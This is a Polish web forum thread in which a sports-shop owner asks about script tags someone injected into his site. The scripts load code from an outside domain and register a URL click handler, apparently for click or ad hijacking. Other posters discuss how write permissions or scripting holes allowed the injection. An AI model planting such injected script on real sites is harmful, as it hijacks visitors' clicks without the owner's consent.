Skocz do zawartości

Co to za sheet ?


gielo

Rekomendowane odpowiedzi

Taki kod znalazłem dzisiaj u siebie na stronie, nie znam java scrypt więc nie wiem co on robi czy mógłby ktoś mi to wyjaśnić ? Jestem natomiast pewny, że nie ja go tam zamieszczałem.

<script src='https://www.ggopisy.pl/ct/js/ct_global.js' type='text/javascript'></script>

<script src='https://www.ggopisy.pl/ct/js/ct_adsense.js' type='text/javascript'></script>

<script type='text/javascript'>

var ct_path ='https://www.ggopisy.pl/ct/index.php';

var ct_cfg = {

autohide: 1

}

ct_registerURLClickHandler( ct_path+'?action=click' );

</script>

Sklep dla sportowców w którym znajdziesz Odżywki oraz suplementy diety dla sportowców, sprzęt siłowy i fitness oraz akcesoria do sportów walki i treningowe Hurt-Detal. Szybka wysyłka na terenie polski i za granicę.

Sklep producenta sprzętu siłowego, fitness oraz akcesoriów do sportów walki. Wysoka jakość, przystepne ceny :)

Odnośnik do komentarza
Udostępnij na innych stronach

Nie, ggopisy.pl to nie moja strona. Jak pisałem nie ja umieszczałem ten kawałek kodu na mojej stronie a zrobił to ktoś z zewnątrz tylko właśnie nie wiem czemu to miało służyć ?

Czy to nie jakieś przekierowanie czy coś w tym stylu ?

Sklep dla sportowców w którym znajdziesz Odżywki oraz suplementy diety dla sportowców, sprzęt siłowy i fitness oraz akcesoria do sportów walki i treningowe Hurt-Detal. Szybka wysyłka na terenie polski i za granicę.

Sklep producenta sprzętu siłowego, fitness oraz akcesoriów do sportów walki. Wysoka jakość, przystepne ceny :)

Odnośnik do komentarza
Udostępnij na innych stronach

Takie właśnie miałem podejrzenie. Kurde trochę też w tym i mojej winy bo kiedyś przy edycji strony zapomniałem zmienić mu prawa dostępu aby niemożliwy był zapis i ktoś to jak widzę wykorzystał.

Kurde, że też niektórzy się nie boją, że takie zagrywki dość szybko mogą się w sądzie skończyć

Hmm ale mam inny pomysł ... Kolesie się na tym przejadą za to

Sklep dla sportowców w którym znajdziesz Odżywki oraz suplementy diety dla sportowców, sprzęt siłowy i fitness oraz akcesoria do sportów walki i treningowe Hurt-Detal. Szybka wysyłka na terenie polski i za granicę.

Sklep producenta sprzętu siłowego, fitness oraz akcesoriów do sportów walki. Wysoka jakość, przystepne ceny :)

Odnośnik do komentarza
Udostępnij na innych stronach

Przeczytaj wyżej jak się to mogło stać bo pisze

Sklep dla sportowców w którym znajdziesz Odżywki oraz suplementy diety dla sportowców, sprzęt siłowy i fitness oraz akcesoria do sportów walki i treningowe Hurt-Detal. Szybka wysyłka na terenie polski i za granicę.

Sklep producenta sprzętu siłowego, fitness oraz akcesoriów do sportów walki. Wysoka jakość, przystepne ceny :)

Odnośnik do komentarza
Udostępnij na innych stronach

same prawa zapisu to jeszcze nic, musisz mieć dziurę w oskryptowaniu, jezeli oslryptowanie jest ok, to niezależnie od ustawień praw nikt Ci nic nie zmieni, oczywiście od stron www, co innego od strony serwera :)

- Reklama -

Podatki we Wrocławiu: biuro podatkowe wrocław

Miejscówa do parkowania przy Okęciu: parking okęcie

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności